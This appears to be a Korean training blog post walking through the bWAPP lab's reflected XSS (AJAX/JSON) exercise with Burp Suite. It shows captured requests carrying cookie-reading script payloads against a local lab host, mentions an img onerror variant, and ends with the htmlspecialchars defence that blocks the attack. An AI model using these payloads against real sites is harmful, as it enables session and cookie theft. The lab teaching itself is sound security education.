정보보안(구버전)/ bWAPP 2019. 2. 13. 09:54

웹 해킹 bWAPP - 44. A3 - Cross-Site Scripting(XSS) - Reflected(AJAX/JSON)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Cross-Site Scripting(XSS)

 

 - OWASP Top10 A3 - 크로스 사이트 스크립팅

 - 자바 스크립트에 의해서 쿠키, 아이디/패스워드, 세션 정보를 획득하거나, 비정상적인 동작을 발생시키는 취약점이다.
 - Ex) 피싱 사이트 접속, 악성 프로그램 다운로드 및 설치, 랜섬 웨어, 쿠기 정보를 이용한 계정 접속

 

 

 

2. AJAX(Asynchronous Javascript And XML)

 

 - 다른 도메인의 서버 URL을 호출하여 데이터를 가져올 수 있는 기능을 수행한다.

 - 사용자와 웹페이지와 자유롭게 상호작용 할 수 있는 기능을 수행한다.

 - 별도의 프로그램 없이 웹페이지를 다시 로딩할 필요 없이 내용, 메뉴 등을 제공한다.

 - 서버 처리를 대기하지 않고, 비동기 요청이 가능하다.



 

3. JSON(JavaScript Object Notation)

 

 - 자바스크립트 기반으로 개발됬으며, 여러 프로그래밍 언어에도 사용할 수 있는 독립형 언어
 - 웹 브라우저와 웹 서버 간 비동기 통신, 웹 서버 간의 데이터 교환 등에 주로 사용

 - Ex) 자바스크립과 PHP 간에 JSON으로 데이터 전달

 

 

 

4. Cross-Site Scripting(XSS) - Reflected(AJAX/JSON)

 

 - 이 시나리오는 웹페이지를 접근하면 'xss_ajax_2-1.php' 페이지가 먼저 실행된다.

 - 폼에 입력되는 내용들은 'xss_ajax_2-2.php'로 넘겨버리기 때문에 인젝션하면 바로 XSS가 실행되지 않는다.

 

 

bee@bee-box:/var/www/bWAPP$ vi xss_ajax_2-1.php

~ 중간 생략 ~

 

        function process()
        {
            // Proceeds only if the xmlHttp object isn't busy
            if(xmlHttp.readyState == 4 || xmlHttp.readyState == 0)
            {
                // Retrieves the movie title typed by the user on the form
                // title = document.getElementById("title").value;
                title = encodeURIComponent(document.getElementById("title").value);
                // Executes the 'xss_ajax_1-2.php' page from the server
                xmlHttp.open("GET", "xss_ajax_2-2.php?title=" + title, true);
                // Defines the method to handle server responses
                xmlHttp.onreadystatechange = handleServerResponse;
                // Makes the server request
                xmlHttp.send(null);
            }
            else
                // If the connection is busy, try again after one second
                setTimeout("process()", 1000);
        }

 

:q! 

 

 

 

Ex1) Cross-Site Scripting(XSS) - Reflected(AJAX/JSON) 이해 I

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

'Iron Man' 영화 제목을 한글자씩 입력하여 AJAX 동작 확인

 

 

 

'Iron Man' 입력이 완료되면 나오는 메세지 확인

 

 

 

44-0. 스크립트 인젝션 추가-1.txt

스크립트 인젝션 실시

 

 

 

 

Ex2) Cross-Site Scripting(XSS) - Reflected(AJAX/JSON) 이해 II

 

 

Intercept -> 'Intercept is on' 으로 변경 실시

 

 

주소창 -> 엔터 실시

 

 

 

버프슈트 Intercept 내용 확인 -> 'xss_ajax_2-1.php' 페이지 접속 확인

 

 

 

'Forward' 버튼 클릭

 

 

 

'Forward' 버튼 클릭

 

 

 

'xxs_ajax_2-2.php' 페이지 전환 확인

 

 

 

44-0. 스크립트 인젝션 추가-1.txt

스크립트 인젝션 실시

 

 

스크립트 인젝션

GET /bWAPP/xss_ajax_2-2.php?title=<script>alert(document.cookie)</script> HTTP/1.1

Host: 192.168.20.205

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.205/bWAPP/xss_ajax_2-1.php

Cookie: PHPSESSID=03688d3e9eab4eb8229899178957b5a6; security_level=0

Connection: close 

 

 

 

마우스 우클릭 -> 'Send to Repeater' 클릭

 

 

 

'Forward' 버튼 클릭

 

 

'Intercept is on'를 클릭하여 off 실시

 

 

 

Repeater -> 'Go' 버튼 클릭 -> Response 내용 확인

 

 

 

Response 내용 확인

{"movies":[{"response":"<script>prompt('Please??? Sorry, we don't have that movie :("}]}

Date: Wed, 13 Feb 2019 01:51:53 GMT

Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g

X-Powered-By: PHP/5.2.4-2ubuntu5

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 88

Connection: close

Content-Type: text/html

 

{"movies":[{"response":"<script>prompt('Please??? Sorry, we don't have that movie :("}]} 

 

 

 

마우스 우클릭 -> 'Request in browser' 클릭 -> 'In original session' 클릭

 

 

 

URL 주소 'copy' 버튼 클릭

 

 

 

주소창에 Copy 한 URL 입력 및 엔터 실시

 

 

 

쿠키 정보 획득

 

 

 

44-1. 스크립트 인젝션 추가-2.txt

주소창에 스크립트 인젝션 실시

 

 

 

prompt() 스크립트 확인

 

 

 

 

Ex3) Cross-Site Scripting(XSS) - Reflected(AJAX/JSON) 이해 III

 

 

44-2. 스크립트 인젝션 추가-3.txt

스크립트 인젝션 실시

 

 

 

'Intercept is on' 실시

 

 

 

'xss_ajax_2-2.php' 스크립트 인젝션 내용 확인 및 인젝션 링크 복사 실시

GET /bWAPP/xss_ajax_2-2.php?title=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1

Host: 192.168.20.205

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.20.205/bWAPP/xss_ajax_2-1.php

Cookie: PHPSESSID=03688d3e9eab4eb8229899178957b5a6; security_level=0

Connection: close 

 

 

 

'Intercept is on'를 클릭하여 off 실시

 

 

 

'Intercept is off' 확인

 

 

 

44-3. 스크립트 인젝션 추가-4.txt

주소창에 스크립트 인젝션 실시

 

 

 

쿠키 정보 획득

 

 

 

 

Ex4) Cross-Site Scripting(XSS) - Reflected(AJAX/JSON) 이해 IV

 

 

44-4. 스크립트 인젝션 추가-5.txt

이미지 소스 & 'onerror'를 이용한 스크립트 인젝션 실시(인젝션때 단어 천천히 입력)

 

 

[참고] onerror

 

 - 이미지 에러가 발생되면 onerror 다음에 나오는것이 실행됨

 

 

 

Ex5) 'xss_ajax_2-2.php' & 'functions_external.php' 파일 내용 확인

 

bee@bee-box:/var/www/bWAPP$ ls -l xss_ajax_2-2.php
-rw-rw-r-- 1 root www-data 3293 2014-11-02 23:52 xss_ajax_2-2.php

bee@bee-box:/var/www/bWAPP$ vi xss_ajax_2-2.php

~ 중간 생략 ~

 

            // Creates the response array
            $movies = array(
                "movies" => array(
                    array(
                        "response" => xss_check_3($title) . "??? Sorry, we don't have that movie :("
                    )
                )
            );

:q! 

 

 

 

bee@bee-box:/var/www/bWAPP$ gedit functions_external.php

~ 중간 생략 ~

 

 function xss_check_3($data, $encoding = "UTF-8")

{

 

    // htmlspecialchars - converts special characters to HTML entities   

    // '&' (ampersand) becomes '&amp;'

    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set

    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set

    // '<' (less than) becomes '&lt;'

    // '>' (greater than) becomes '&gt;' 

   

    return htmlspecialchars($data, ENT_QUOTES, $encoding); 

 

 

[참고] 'htmlspecialchars' 함수


 - HTML 코드에 메타케릭터를 입력하여 다른것을 출력하거나 실행하는 것을 방지할때 사용하는 함수

 - 즉, HTML 메타케릭터가 HTML 태그로 적용되는 것을 방지하여 일반 문자로 처리해주는 기능 수행


 

 

Ex6) 보안 레벨 'High' 변경

 

보안 레벨 및 시나리오 선택

 

 

 

44-5. 스크립트 인젝션 추가-6.txt

스크립트 인젝션 실패

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 44. A3 - bWAPP Cross-Site Scripting(XSS) - Reflected(AJAX&JSON)   https://youtu.be/Q7esViTECKY

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q